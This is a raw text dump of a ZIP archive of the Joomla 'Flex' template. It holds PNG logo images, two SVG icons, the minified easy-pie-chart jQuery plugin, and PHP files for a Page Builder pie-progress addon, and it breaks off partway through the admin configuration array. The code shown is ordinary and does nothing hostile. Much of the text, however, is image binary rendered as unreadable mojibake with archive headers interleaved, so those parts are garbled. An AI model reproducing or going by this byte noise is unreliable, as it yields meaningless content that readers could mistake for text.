{[�ͣ,�tY���,:��]�
�mlZ�g%��F�П��p�N}�[�`��ڙ���T�מ�@��{KK�)��A�!�,����m�:�,����%<�����2M�oaa�6��P����$Xk�9#��{��3Vt[�k����Ҟt�+Tv�>g�F�m�n�4�X��,-�~�aٹF3ֱg��,��[��~VL�p��
땉����i�Ϳ���4,ʹHXOZ�W�cX��YX���*��Js��h�m�p��Ť'��ВU`=i5�6����B9�Y}�LX�T�֎j�5dX��,�N�k?է;kqjzֳM���-�v��7Zo"��j׏�4��m�xtgJ[̑9m+f)l0�p�V�N��,xy�%`P�.$�:/c�4n�ph5e�Ѻ�se�%����ߝ�9ˮ=p7fW���Z1?�ڔ�*u��6��k��Q腂����^��h[�+��K[���Pga��V�m7�QA�J�'�^ɖ��ޙ��*u��Q�IO�cĀ��X��=����Y��uP]k(+��=j�w+T?��[22*�m%lQ�'��,g�G!C3̌�CXL�Z�-Gʔ����=eZB=G�{d�����g�l+iˑ�&�C������|�N���+�ݰ,�i�,�����l�"a߇��!A�;�t�����P;سf/�V��,O�t��o����r��b�u�1u�ߐ���m���4`�6�!�&����U���O�z���u�
XOZ�Y��ЅGX��!a!,����BX+g�°��
���w��E�<��wG)J��XM/S
�킁����L��y�~�IEND�B`�PK!?��B''$flex/images/presets/preset1/logo.pngnu&1i��PNG


IHDR�2�R�(gAMA���asRGB���QPLTE�������������������H3����H3�������H3�k_�H3�������������������k[����S@��|���q�-9tRNS(����D?� ��l�2�ZIDATX���r� ��\D�4/Ѿ��v�5J�i�v��t2�ܗ���%+I�2A�˨ޒ�"�:��|
V��2V��X���6�����������DJI�
%��n7����v�~#�؄4����O�XT*�9#���߈���k`��F��	�ѱY ��%O��`��jJ[c>�`��w��fxzQ�]v�1��ŋ��)�%\�dZm
��q9*�e�E���pK"<��=r&`�Ψt<Z�‡(X�j���QKy�����h�&-���,,U�k��4�N���h��4� �X|���Q:��[CDN��-��HCX��X%t�hZ�7� �}��i�Mc��s���Lzµªׁ�'Q�D�^�\[ι�
���>�:P�"��pV���LT�%�A�9(� �}�q��M����T��
���BabnCv��g.�#�5����lv=��C���x&�3�ͨ�y�U���i�	qZ����'?� T��yk�.��`���&uG���أ��]��W�&?�?(*�C�X�@��sө�
xW`:�����<�u;��O#��d���*�K��u}VU�F��}�4�2(��IEND�B`�PK!2�4��'flex/images/presets/preset1/logo@2x.pngnu&1i��PNG


IHDR,d��gAMA���asRGB���?PLTE�������������������H3�H3����H3�H3������������̜���yi�jY�����-�tRNS���s@�>̐�4��IDATx���b� �%�F���z��2h�vN�+i��˙aP/
��4]ӈ!�[�J7����ÑU����ORX�WY뚖UuEX4�BXa!,����BXa!,���r�j�BX뽰��Hkg�����;ǵ�Ia!,����BXXgy�Y+@���a��뀰�{`	�f���`qF���0�[�̸b9L���#�CX������ծ!�Q��Y��F��Xa]����A,xRXC�X���E�`Q�"�m)`0>���i
*��k�%3â�U
-^�!'
04��3����լ�2�RX���H�~̦�V��h
Z��k����5�J�:5��%OkX�~V6R�VX�G��J[BA׊�uV��h
�ՙ0$�x�B���U��^X��U���Ya��9�!X%�{��3�R�ƍ^ÒJF��Rp�W��~���X.�����V��������yk{M)aQǠF�F�QęD^���zK�~4����@`��������F2X����{)����g���ZÍZZ�;����P��rmMw~�,���XGeG�J"T��m��Q��&J�F�k���/xzXU/�ܘ5Q�Y>��yX�����#��o��?���4,%i�,��f4V�P�5}X��YX[5�'�/�,#mղ?ˣ~pâ�!�7��Q�t0Q�r�����jl�r�
��H���`qT?��I�s�'�t�5��!�\��Җ{��a�}��K깺�)��Z��@�Kxw�����Ec�Zx=5�_7�Җ�$(�"q�7O�����
;�+����t^��6,f���k�.�\me��Wi�Z7�,<6��x!6�9z�5*�L�uA[ef�=fT�$���\����9Kߋ��+��
��$@�ْq���t^�o�y:�
����Y��n>�H��)6^���Ac�Y��uhj��a
gaq��	�������y���1��Y���s����Z}f���%,Q@!k�5d͠Zk�'a��8��#��U2�u<�
�HK����,,-ܨ�1�W��z��f74ʔ:l֠�t���*���-�u����ٞg�j/��9v����,Ow
UX>�*��Z��\�}��;���W�gU�MR|�[o��U��=���8��VZ�֓�7+�Ut��c�BXa!,���Š)��W}�~���_��(Ii}��
b����B�P�7��l���_�IEND�B`�PK!�l�$flex/images/presets/preset5/logo.pngnu&1i��PNG


IHDR�2�R�(gAMA���asRGB���KPLTE������������������"�����"��������"��"����������������͗��Jŭ�Ŭ��c͸MI
tRNS�¢�&�A?f��z��WLIDATX���r� �E.�&������� (�B��p~�M2|��a��Ȋҥ�P}�5J'q�8�kuV��2V��X��������u��ta�kIk���.V*.꺎f�����x.Ě������)�o���j a� ��Ρ�#�ƀX�[�\c!�_�E&��DbqfZ�)qΧ,�������Xb}�D,!8�@�Kf�O��4����p�d��*!K�MT���P<�|�9�cMʨ�_ŠA�&E���%l
K��k�ŵ���l隘�7X�p�8�@כD۩1v���8��e
�,�պ�ʀ�}�DJ��o�M-�f �o��T4�����r�T����ٺ^��͗���ʵu��ԑ�e$��1\��{��J��K˓PR��I�\L`��;����X���&���G�Տ{W�j/�ai��bT�m�v�n�h��_�d	��;X��4��IZdfN\?����NLZl���\ն_l�aA�\Z�6�y����{���.ge1���#ȿ���׋5p��T�5���v���ů�r�H[������*�ǡ��=���<>BT৑)�b��2�YXE�u9	���"UV��#��D�	�ZIEND�B`�PK!�gmm'flex/images/presets/preset5/logo@2x.pngnu&1i��PNG


IHDR,d��gAMA���asRGB���<PLTE������"�����������"�����"��"��������������坝�\˵Kƭ��Ч�Y�
tRNS����@B��ӷ�IDATx��ق� �m���.��j�P�5�\��_���0�tBCCC�4;�1����K.k(�
�?��"|�`�e�u�*�:�eu9#��C����BXa!,����BXa!�Ұ�-��z/,�l������uָ�0���BXa!,̳�,�ak����a��ꀰ�{`q~_fs��|�(���׎�W�ZA����ů>#^X��#j��V�\�׳��̆	`��Ô�dyQ��hVXc+M�����ŠA5��!��a
��AKL��j:��b�(��Bn�E�W�ǛAKH�ʪ,�]�ME�)[+=�y6loOZ��Z�➵
N��i�0C��9`����?�,����
�-�R��ڛE+�g1߁E�x� m�E]�DzX�VV��]��Y��x��U���_�V���U�0��=kK}>���Dw.���kV������e��t�#"�3�d�ԋ�U�E�9ȱZŷ��Y�l�����!>�Hk
V��9б�K���g�7�E�Z�͚�7�ܫ"v�
K�n��Җ;�}�r�I,_�ѹ<���9���N���g1��D�C�#��f�h��Y�x�z�҂�Y!��qX�(�G$*�^��d�0,E��"����`�CX��QX�tH���HM�&�qX�����D��u���G�Q�'��.�MH�T�����>A�—?��!U��Z=�+��Yi�L\�qX>�`�`Zߜ�b�%��*η�͇����Sl#�S�VH+�7�P��x�����#PlG�(�Ƀ%����a/4��ܰ�Q���������ڮ��i]���$�_���~ԉ�N��>�匵�(p�����I([�鉖�W�ɣ������[75a52͎M{8!�Ӗ�v3']e9�}?�U��ZM�*[�@;ڬ9�R��j$�k��j��x{�H��:Í* C�ݾ�i	�՝�p���ۨP�f�j�Za:zh����ob�%�qF��r�y~tu��VԖ�Qh&��(,7�3�W�������F��g��_�,-p����穊Y���e;[W�m��Ξ�$��"7��q~���a�b��Z��\�}��;��(�
�&�?�р��$������~��~�Q�LRu�
XwZ���%�
���!a!,����BX+��̰���;,��8��oG�J��XM����ڛ�a���li�IEND�B`�PK!�`�a��'flex/images/presets/preset2/logo@2x.pngnu&1i��PNG


IHDR,d��gAMA���asRGB���<PLTE��������$�����������$��$�����$����������Н����^��M����ܭ���
tRNS����@�F�2bX�IDATx��m�� �ŀ���=�����ٚq�lj�r���0CVU````ͮ��BT��Yv#�*�.X%��w���
�U�u=��
�~4�X`,���X`,��J��M�,��YX�2QYū��u�ָ��4��X`,ȳ"�,��`������l�`��bl^f3�B���ӏ��W��Z��;�T1��b��� ,BG�Z�����V�k��!l	�aX���T9�ŋ�t{�SaM-�f�7�U�,í6�!^0��Fv�f
M���롱Z��.�9�A���kj$-��j
V�`��n1���Đ-I��<��J�����xiXR��u��Eqs������m鷲rzVS��'���G��dK�#'�Ym�ӲiO�,�S��j���Ix�"H�lW.�V����Z�i�":uzR��w�㫊�l���6�Ջ�����?���b�T$u>���굒�g:l`�=�d���2�ę�b�<��k�c='ES��5K�x�,��C|�"��?ӂ��X�N��<K���$X"�3���˃3	��t(��NRա>�	Q�BiGW�s����Qe�v�X~V���h���d�ej �,X~���ۏY��Գb�aI�*ki�H�ڌg)�E��۰Ѫ��Z�a"7d|�Q)
���ҦC\֬�k"�["-;�p���È3�:?uտ]�^��e˒gu	n�K'���i��а�X�-(bTr�ӕZ�h��Y�>�в�G+�^-���|k�V-g+���K�@Õ)��V�m��f&������T��5i����ь��7�
T��pz�Y�a�p:O�����Y����2��eZXD[�b�L�F98c�&
�����l�d��Ȏ�(�F�7�#d����ӚZ2͎.{ƴӖ��fN��rl�~�g�8Z�!��C�)j-��k�fN��E�^�9�<�h�7��c����VAZ��F��e�&��:�U�yD2�Ŝ��h/��%�,st���m9���ҨH��,K��6Fls�m~tu�3�VҖ�I��8�
��r2����	b�'R���8˒:m�$#0Vმ��"d��Q��=��Ѻ����5Ϟ5��[֜���`�ο�Dm�K�ʋq���<b�ο^6x�ϳO���%o��yB���8�g��*X�s�xV�P�X�����X`,����ɰ���;,��8��oG9�ַ�ZsR(^�؇�
��y\��IEND�B`�PK!�e�$flex/images/presets/preset2/logo.pngnu&1i��PNG


IHDR�2�R�(gAMA���asRGB���KPLTE��������������������$�����$��������$��$ǵ���$�������������ѓ�����M��r"���tRNS�4���A?�c�x��Ѯ�TIDATX���r� ���d�]�I� *U��mf�_$N��ݳg7I����# 򻨞Aq��x܃�'�����%�����X}�ރ��m�7��O�r_qiUU"a��v�y�"��b�ډ���M�z,^b��C,�Ź�l�FOx�H�	�ŢH_�EF��c�����B42�,�\*��00�e,ً+�X,u
J� �/���e5�;��VS�\s��C,�]a�{#8d(��:(�	��9�V�L���W%,3K�y���c5��:Ζ����kpD-A��(���Sc�͙�M�����*��2�`�j%Dw�[��}Xb���ˡ2
�|'��#.�N�&4��ْ�4��r�v�X\iK8�]/+x��\�x6|ʍ��#_R��N\�dz�V3���X��|�����#�ya����@�E%�p�����}��.%c:� ���7�f�99~�?���^�L\�Z?�c��1�n5׼D�a��
b^of��;۷tw!���!̀!��W��k��~
,�M��:�6���1վ/]¶&�q���y�|�)������f��˟F��M�JXwae�0��MXy�3�u����ӫ�"��IEND�B`�PK!�
aa'flex/images/presets/preset8/logo@2x.pngnu&1i��PNG


IHDR,d��gAMA���asRGB���*PLTE��������������������������������䯯����@DItRNS?}���؉_�IDATx�흉v� �eO ���^#YX��;c�9��m>�Y����@CCC�kF��AT��N&~�P�L�-�z��-X�+,�S�"}Y)���BXa!,����BXa!,����Xf.7������+#�h���a��g������BXaa�UPg!�
�c��
��a}�뀰�w`�f���`q*��'+�_pd�����E�+����P���=�3�}WvU�]�����"6�EY|H�q����;W���2mt`�`E���Sy`���e�YC����|�G����]�9����)��q�<Vv��+�-������jK���:8(A\�cS��#lѦ�
־<�P�ʚ�:5��#���$�;�r��y�͘%�4�����fj������
+�Y�]z�G��(e`��t���i��[��ż����Oc֙ٯ�|���C?����-+���:]�b���&�Q���,"I���GKߊYA�z�,�	>��eP�7�D@
��iK�8��^tYkw�$3lOh���WE���w�V��g�Y���^tZ�찑�Tы�JYze��ۢE�5i+[�3���h��;�zZ�xJ��i���,J�|*k�L[����ayAK�����q�������.,>6�{�:P��܇UP?�aѢ�H��"#`��^����Ix��G�:�VȄ�.JwZ!�Jm媃���%�E`��F/w�g	���?���u��˝�����[H�3)���v0l�Hq+��Kj:����?7q�",
1�"�
sDðU47Lh�bm�k_�h�@a�G#�%�as
�rP[9C�Th���)_�R����<#�w����!��9
�V�Dz���\Oۛ����X�t��FI!�*M+�ZqQ�F�6Y���)u?X�b"e�2Z�$�>xH����s�4d��Ѳ�Aw�7a��%\U��%-O{��픺�Ɛ��k��`�z/�x�w��@XQ4���o�9k�.k|Gt��n9�V�#�ΐ3?�9��V͖��k��QV�D��:y�K�Q�V7mF�U�&���e��D��x"��
��!y�Ke�<w��ٳ�����[(���gCO(���x���c����hū�m�䒦���R���j)̃˕�k��j�Lx]�bm�E0�!a!,����BX�;�;�"��!��b���Qza�Q��*–�4�������,�G��`IEND�B`�PK!�3��$flex/images/presets/preset8/logo.pngnu&1i��PNG


IHDR�2�R�(gAMA���asRGB���6PLTE��������������������������������������������ʬ�����,�.�
tRNSţ�'�D@3�ғJIDATX��ۂ� E�r%��g8�h�L�̸{�|hu.�]Ms�J��/ڝEE�*��uT==���j/����Xf�ɼk��4f�X�xk�R��bu��r����~
�#%֐Ӹw_���V�ލ�M;]b1I	!��y��x�l$k,�(�y����s�7z>!��H�eu:U:h<�E�[$T�D�p7��ńj8��=����|�\��^�͖շ�K��i��E8���㯑�bѸt�ZMK�y:����y�Ȏ�z���-���BOV_{Ʋ �+�3�~V��&��E�{!����.�eӯ�C�o�
��[<����z!��*Zo��K��6W2N�%,F�U�q�Z?�W��Ju[M��X�e���ΥcM���+q�y�E�(�7����'���12�5���|k����@�	����{�Lkȏ�<��	L�e
	�L�i7��q��У?,���@��O�2�`���#��Av	C�D�7r
C)o�v%�%N�&V��3^1�He�1��6n�K~4?7T.R��1�@���ҩ	O�]�~�'��l�o���������X�XM[��O‚��.U�`�wH��IEND�B`�PK!a�Z��flex/images/cd-icon-cart.svgnu&1i�<?xml version="1.0" encoding="utf-8"?>
<!-- Generator: Adobe Illustrator 17.1.0, SVG Export Plug-In . SVG Version: 6.00 Build 0)  -->
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"
	 viewBox="0 0 32 32" enable-background="new 0 0 32 32" xml:space="preserve">
<g opacity="0.8">
	<path fill="#FFFFFF" d="M4,21c0,0.6,0.4,1,1,1h25c0.6,0,1-0.4,1-1s-0.4-1-1-1H6v-2h19c0.5,0,0.9-0.3,1-0.8l3-12
		c0.1-0.3,0-0.6-0.2-0.9S28.3,4,28,4H6V1c0-0.6-0.4-1-1-1H1C0.4,0,0,0.4,0,1s0.4,1,1,1h3V21z"/>
	<circle fill="#FFFFFF" cx="7" cy="28" r="3"/>
	<circle fill="#FFFFFF" cx="28" cy="28" r="3"/>
</g>
</svg>
PK!����flex/images/gmap-marker.pngnu&1i��PNG


IHDR00W��tEXtSoftwareAdobe ImageReadyq�e<$IDATx��XKkSQ��M�m���G]u#��-��Pݘ��b~A��MC�@҅�B� ҅#.J��@�E\xۆX�Ә0�:ǎ����ޓs���9g�;��y�@2��ZL��6?��cu�j��VF͡���QӁ��r�@Ǚ��Qݒ��D�)t�99�pt/�x�]��eш����i�� G)g�y:�9fI��d�ƕK!4�'qU�F*edF !yYOH��q_S��
|>:������;����zM=�(�eD�Fۇ��AU���v�Ll
���#��*����z��f0f�Yp]���J%�^����ձ�@�D�lV��*(CCM�F�{DQ`�X�9��	����ֆt�8m��iϾ!{\��e��p��-|�
�m�A�
�;�_��Mb��1��j���h����l����у��}��Yd����mJCw$-+V�`E
+�f$;�!;�V�E��ou3g?#ɜ$\�@��T�P���q��Y�i��%�� �Js����B�p����$���˅gߜ�\QZ�P��Hu�L�\��;>N�1��b"�v@g�pV"�#Ij�w���|��h�v_��&�'D��ϋE�8�9�"��^s�7'B�ǭ
�����E|���F��X��ݞB�W���Z�
{��j�F��]_�P�.H}Y��+��#�����d|��s8��V*/'S�D�>z��Eh����>|���Z��B�n��.j�bܭ�N����X�g_,�JR��J�\�Va ��#��L�C!H��IEND�B`�PK!��Z���flex/images/gmap-icon.svgnu&1i�<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="32px" height="64px" viewBox="0 0 32 64" enable-background="new 0 0 32 64" xml:space="preserve">
<rect x="12" y="47" fill="#FFFFFF" width="8" height="2"/>
<g>
	<rect x="15" y="12" fill="#FFFFFF" width="2" height="8"/>
	<rect x="12" y="15" fill="#FFFFFF" width="8" height="2"/>
</g>
</svg>PK!�$)���Dflex/sppagebuilder/addons/pie_progress/js/jquery.easypiechart.min.jsnu&1i�/**!
 * easy-pie-chart
 * Lightweight plugin to render simple, animated and retina optimized pie charts
 *
 * @license 
 * @author Robert Fleischmann <rendro87@gmail.com> (http://robert-fleischmann.de)
 * @version 2.1.7
 **/
!function(a,b){"function"==typeof define&&define.amd?define(["jquery"],function(a){return b(a)}):"object"==typeof exports?module.exports=b(require("jquery")):b(jQuery)}(this,function(a){var b=function(a,b){var c,d=document.createElement("canvas");a.appendChild(d),"object"==typeof G_vmlCanvasManager&&G_vmlCanvasManager.initElement(d);var e=d.getContext("2d");d.width=d.height=b.size;var f=1;window.devicePixelRatio>1&&(f=window.devicePixelRatio,d.style.width=d.style.height=[b.size,"px"].join(""),d.width=d.height=b.size*f,e.scale(f,f)),e.translate(b.size/2,b.size/2),e.rotate((-0.5+b.rotate/180)*Math.PI);var g=(b.size-b.lineWidth)/2;b.scaleColor&&b.scaleLength&&(g-=b.scaleLength+2),Date.now=Date.now||function(){return+new Date};var h=function(a,b,c){c=Math.min(Math.max(-1,c||0),1);var d=0>=c?!0:!1;e.beginPath(),e.arc(0,0,g,0,2*Math.PI*c,d),e.strokeStyle=a,e.lineWidth=b,e.stroke()},i=function(){var a,c;e.lineWidth=1,e.fillStyle=b.scaleColor,e.save();for(var d=24;d>0;--d)d%6===0?(c=b.scaleLength,a=0):(c=.6*b.scaleLength,a=b.scaleLength-c),e.fillRect(-b.size/2+a,0,c,1),e.rotate(Math.PI/12);e.restore()},j=function(){return window.requestAnimationFrame||window.webkitRequestAnimationFrame||window.mozRequestAnimationFrame||function(a){window.setTimeout(a,1e3/60)}}(),k=function(){b.scaleColor&&i(),b.trackColor&&h(b.trackColor,b.trackWidth||b.lineWidth,1)};this.getCanvas=function(){return d},this.getCtx=function(){return e},this.clear=function(){e.clearRect(b.size/-2,b.size/-2,b.size,b.size)},this.draw=function(a){b.scaleColor||b.trackColor?e.getImageData&&e.putImageData?c?e.putImageData(c,0,0):(k(),c=e.getImageData(0,0,b.size*f,b.size*f)):(this.clear(),k()):this.clear(),e.lineCap=b.lineCap;var d;d="function"==typeof b.barColor?b.barColor(a):b.barColor,h(d,b.lineWidth,a/100)}.bind(this),this.animate=function(a,c){var d=Date.now();b.onStart(a,c);var e=function(){var f=Math.min(Date.now()-d,b.animate.duration),g=b.easing(this,f,a,c-a,b.animate.duration);this.draw(g),b.onStep(a,c,g),f>=b.animate.duration?b.onStop(a,c):j(e)}.bind(this);j(e)}.bind(this)},c=function(a,c){var d={barColor:"#ef1e25",trackColor:"#f9f9f9",scaleColor:"#dfe0e0",scaleLength:5,lineCap:"round",lineWidth:3,trackWidth:void 0,size:110,rotate:0,animate:{duration:1e3,enabled:!0},easing:function(a,b,c,d,e){return b/=e/2,1>b?d/2*b*b+c:-d/2*(--b*(b-2)-1)+c},onStart:function(a,b){},onStep:function(a,b,c){},onStop:function(a,b){}};if("undefined"!=typeof b)d.renderer=b;else{if("undefined"==typeof SVGRenderer)throw new Error("Please load either the SVG- or the CanvasRenderer");d.renderer=SVGRenderer}var e={},f=0,g=function(){this.el=a,this.options=e;for(var b in d)d.hasOwnProperty(b)&&(e[b]=c&&"undefined"!=typeof c[b]?c[b]:d[b],"function"==typeof e[b]&&(e[b]=e[b].bind(this)));"string"==typeof e.easing&&"undefined"!=typeof jQuery&&jQuery.isFunction(jQuery.easing[e.easing])?e.easing=jQuery.easing[e.easing]:e.easing=d.easing,"number"==typeof e.animate&&(e.animate={duration:e.animate,enabled:!0}),"boolean"!=typeof e.animate||e.animate||(e.animate={duration:1e3,enabled:e.animate}),this.renderer=new e.renderer(a,e),this.renderer.draw(f),a.dataset&&a.dataset.percent?this.update(parseFloat(a.dataset.percent)):a.getAttribute&&a.getAttribute("data-percent")&&this.update(parseFloat(a.getAttribute("data-percent")))}.bind(this);this.update=function(a){return a=parseFloat(a),e.animate.enabled?this.renderer.animate(f,a):this.renderer.draw(a),f=a,this}.bind(this),this.disableAnimation=function(){return e.animate.enabled=!1,this},this.enableAnimation=function(){return e.animate.enabled=!0,this},g()};a.fn.easyPieChart=function(b){return this.each(function(){var d;a.data(this,"easyPieChart")||(d=a.extend({},b,a(this).data()),a.data(this,"easyPieChart",new c(this,d)))})}});PK!fz�^^/flex/sppagebuilder/addons/pie_progress/site.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2017 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined('_JEXEC') or die;

class SppagebuilderAddonPie_progress extends SppagebuilderAddons{

	public function render() {

		$class = (isset($this->addon->settings->class) && $this->addon->settings->class) ? $this->addon->settings->class : '';
		$title = (isset($this->addon->settings->title) && $this->addon->settings->title) ? $this->addon->settings->title : '';
		$heading_selector = (isset($this->addon->settings->heading_selector) && $this->addon->settings->heading_selector) ? $this->addon->settings->heading_selector : 'h4';

		//Options
		$percentage = (isset($this->addon->settings->percentage) && $this->addon->settings->percentage) ? $this->addon->settings->percentage : '';
		$duration = (isset($this->addon->settings->duration) && $this->addon->settings->duration) ? $this->addon->settings->duration : '';
		$border_color = (isset($this->addon->settings->border_color) && $this->addon->settings->border_color) ? $this->addon->settings->border_color : '#eeeeee';
		

		$border_active_color = (isset($this->addon->settings->border_active_color) && $this->addon->settings->border_active_color) ? $this->addon->settings->border_active_color : '';
		
		$border_width = (isset($this->addon->settings->border_width) && $this->addon->settings->border_width) ? $this->addon->settings->border_width : '';
		$size = (isset($this->addon->settings->size) && $this->addon->settings->size) ? $this->addon->settings->size : '';
		// Pixeden icons
		$peicon_name = (isset($this->addon->settings->peicon_name) && $this->addon->settings->peicon_name) ? $this->addon->settings->peicon_name : '';
		$icon_name = (isset($this->addon->settings->icon_name) && $this->addon->settings->icon_name) ? $this->addon->settings->icon_name : '';
		$icon_size = (isset($this->addon->settings->icon_size) && $this->addon->settings->icon_size) ? $this->addon->settings->icon_size : '32';
		$icon_color = (isset($this->addon->settings->icon_color) && $this->addon->settings->icon_color) ? $this->addon->settings->icon_color : '';
		$text = (isset($this->addon->settings->text) && $this->addon->settings->text) ? $this->addon->settings->text : '';
		
		
	$style = 'height:'. (int) $size .'px; width:'. (int) $size .'px;';

	$duration  != '' ? $duration = $duration.'000' : $duration = '2000';
	$icon_size  != '' ? $icon_size = 'font-size:'.$icon_size.'px;line-height:' . ( $icon_size + 1 ) .'px;width:'.$icon_size.'px;height:'.$icon_size.'px;' : $icon_size = 'font-size:32px;width:32px;line-height:31px;'; 

	if($border_active_color == '') {
		$progress_color = '#f14833';
	} else {
		$progress_color = '';
	}

	$output  = '<div class="sppb-addon sppb-addon-pie-progress '. $class .'">';
	$output .= '<div class="sppb-addon-content sppb-text-center">';
	$output .= '<div class="sppb-pie-chart" data-size="'. (int) $size .'" data-percent="'.$percentage.'" data-width="'.$border_width.'" data-barcolor="'.$border_active_color.$progress_color.'" data-animate="'.$duration.'" data-trackcolor="'.$border_color.'" style="'. $style .'">';

	if($icon_name || $peicon_name) {
		$output .= '<div class="sppb-chart-icon"><span>';
		if ($peicon_name) {
			$output .= '<i class="pe ' . $peicon_name . '" style="'. $icon_size .'color:'. $icon_color .';"></i>';
		}else{
			$output .= '<i class="fa ' . $icon_name . '" style="'. $icon_size .'color:'. $icon_color .';"></i>';
		}
		$output .= '</span></div>';
	} else {
		$output .= '<div class="sppb-chart-percent"><span style="color:'. $icon_color .';"></span></div>';
	}

	$output .= '</div>';
	$output .= ($title) ? '<div class="clearfix"></div><'.$heading_selector.' class="sppb-addon-title">' . $title . '</'.$heading_selector.'>' : '';
	$output .= '<div class="sppb-addon-text">';
	$output .= $text;
	$output .= '</div>';

	$output .= '</div>';
	$output .= '</div>';

	return $output;
	}

	public function scripts() {
		$doc = JFactory::getDocument();
		$app = JFactory::getApplication();
		$js[] = JURI::base(true) . '/templates/'.$app->getTemplate().'/sppagebuilder/addons/pie_progress/js/jquery.easypiechart.min.js';
		return $js;
	}

	public function css() {
		$addon_id = '#sppb-addon-' . $this->addon->id;
		$css = '';
		$style = (isset($this->addon->settings->size) && $this->addon->settings->size) ? 'height: '. (int) $this->addon->settings->size .'px; width: '. (int) $this->addon->settings->size .'px;' : '';

		if($style) {
			$css .= $addon_id . ' .sppb-pie-chart {';
			$css .= $style;
			$css .= '}';
		}

		return $css;
	}

}
PK!|�K%%0flex/sppagebuilder/addons/pie_progress/admin.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2017 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined('_JEXEC') or die;

//Include Pixeden Icons
require_once dirname(dirname( __DIR__ )) . '/fields/pixeden-icons.php';

SpAddonsConfig::addonConfig(
	array(
		'type'=>'content',
		'addon_name'=>'sp_pie_progress',
		'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PIE_PROGRESS'),
		'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PIE_PROGRESS_DESC'),
		'category'=>'Content',
		'attr'=>array(
			'general' => array(

				'admin_label'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL_DESC'),
					'std'=> ''
				),

				'percentage'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PIE_PROGRESS_PERCENTAGE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PIE_PROGRESS_PERCENTAGE_DESC'),
					'min'=>-100,
					'max'=>100,
					'std'=>75
				),

				'size'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PIE_PROGRESS_SIZE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PIE_PROGRESS_SIZE_DESC'),
					'min'=>50,
					'max'=>1000,
					'std'=>110
				),
				
				'duration'=>array(
					'type'=>'slider',
					'title'=>JText::_('Animation Effect Duration'),
					'desc'=>JText::_('Time in seconds for an animation (Pie Progress). Default is 2 (seconds)'),
					//'placeholder'=>2,
					'std'=>2,
					'min'=>1,
					'max'=>10
				),

				'border_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PIE_PROGRESS_BORDER_COLOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PIE_PROGRESS_BORDER_COLOR_DESC'),
					'std'=>'#f5f5f5',
				),

				'border_active_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PIE_PROGRESS_BORDER_COLOR_ACTIVE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PIE_PROGRESS_BORDER_COLOR_ACTIVE_DESC'),
					'std'=>'#04c6f7',
				),

				'border_width'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PIE_PROGRESS_BORDER_WIDTH'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_PIE_PROGRESS_BORDER_WIDTH_DESC'),
					'min'=>1,
					'max'=>100,
					'std'=>5
				),

				'separator1'=>array(
				'type'=>'separator', 
				'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PIE_PROGRESS_ICON_OPTIONS'),
				),

				'peicon_name'=>array( // Pixeden Icons
					'type'=>'select', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_PE_ICON_NAME'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_PE_ICON_NAME_DESC'),
					'values'=> $peicon_list
				),
				
				'icon_name'=>array(
					'type'=>'icon', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_FONTAWESOME_ICON_NAME'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_FONTAWESOME_ICON_NAME_DESC'),
					'std'=> ''
				),
				
				'icon_color'=>array(
					'type'=>'color',
					'title'=>JText::_('FLEX_ADDON_ICON_TXT_COLOR'),
					'desc'=>JText::_('FLEX_ADDON_ICON_TXT_COLOR_DESC'),
					'std'=>'',
				),
				/*
				'icon_size'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_ICON_SIZE'),
					'values'=>array(
						'fa-fw'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_ICON_SIZE_STANDARD'),
						'fa-lg fa-fw'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_ICON_SIZE_TINY'),
						'fa-2x fa-fw'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_ICON_SIZE_SMALL'),
						'fa-3x fa-fw'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_ICON_SIZE_MEDIUM'),
						'fa-4x fa-fw'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_ICON_SIZE_LARGE'),
						'fa-5x fa-fw'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_ICON_SIZE_EXTRA_LARGE'),
					),
					'std'=>'fa-3x fa-fw',
				),
				

				'icon_size'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_ICON_SIZE'),
